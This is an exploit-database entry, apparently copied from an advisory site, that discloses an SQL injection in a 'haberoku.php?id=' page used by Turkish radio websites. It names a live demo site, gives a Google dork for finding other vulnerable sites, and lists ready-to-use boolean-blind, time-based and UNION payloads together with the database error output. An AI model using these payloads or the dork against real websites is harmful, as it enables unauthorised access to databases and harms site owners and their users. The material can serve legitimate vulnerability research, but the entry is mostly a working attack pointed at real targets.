Turkish Radio Web Page SQL İnjection

CVE	Category	Price	Severity
N/A	CWE-89	Unknown	High

Author	Risk	Exploitation Type	Date
Unknown	High	Remote	2019-05-12

Our sensors found this exploit at: https://cxsecurity.com/ascii/WLB-2019050134

Below is a copy:

Turkish Radio Web Page SQL njection

Exploit Title : 
# Author [ Discovered By ] : Prototyqe - furkan zer
# Team : Cyberizm Digital Security Army
# Date : 10/05/2019
# Tested On : Windows and Linux
# Category : WebApps
# Exploit Risk : Medium
# Google Dorks : Mary Rose School Hong Kong
# Vulnerability Type : CWE-89 [ Improper Neutralization of 
Special Elements used in an SQL Command ('SQL Injection') ]

# Dork : inurl:"haberoku.php?id=" intext:"radyo"

Demo web page : 

http://www.radyoumut.co.uk/haberoku.php?id=123'

sql vul : 


Warning: mysql_fetch_array() expects parameter 1 to be resource, boolean given in /home/hisarfm/public_html/haberoku.php on line 117



/haberoku.php?id=[ SQL-njection]

payload 
: Parameter: id (GET)
    Type: boolean-based blind
    Title: AND boolean-based blind - WHERE or HAVING clause
    Payload: id=133 AND 8825=8825

    Type: AND/OR time-based blind
    Title: MySQL >= 5.0.12 AND time-based blind
    Payload: id=133 AND SLEEP(5)

    Type: UNION query
    Title: Generic UNION query (NULL) - 10 columns
    Payload: id=133 UNION ALL SELECT NULL,NULL,NULL,CONCAT(0x71767a7a71,0x7758786552774d4847497458736653556d4e415842494f74476d525a5449577a7057447156465270,0x7170787671),NULL,NULL,NULL,NULL,NULL,NULL-- ZLin

This information is provided for TESTING and LEGAL RESEARCH purposes only.
All trademarks used are properties of their respective owners. By visiting this website you agree to Terms of Use and Privacy Policy and Impressum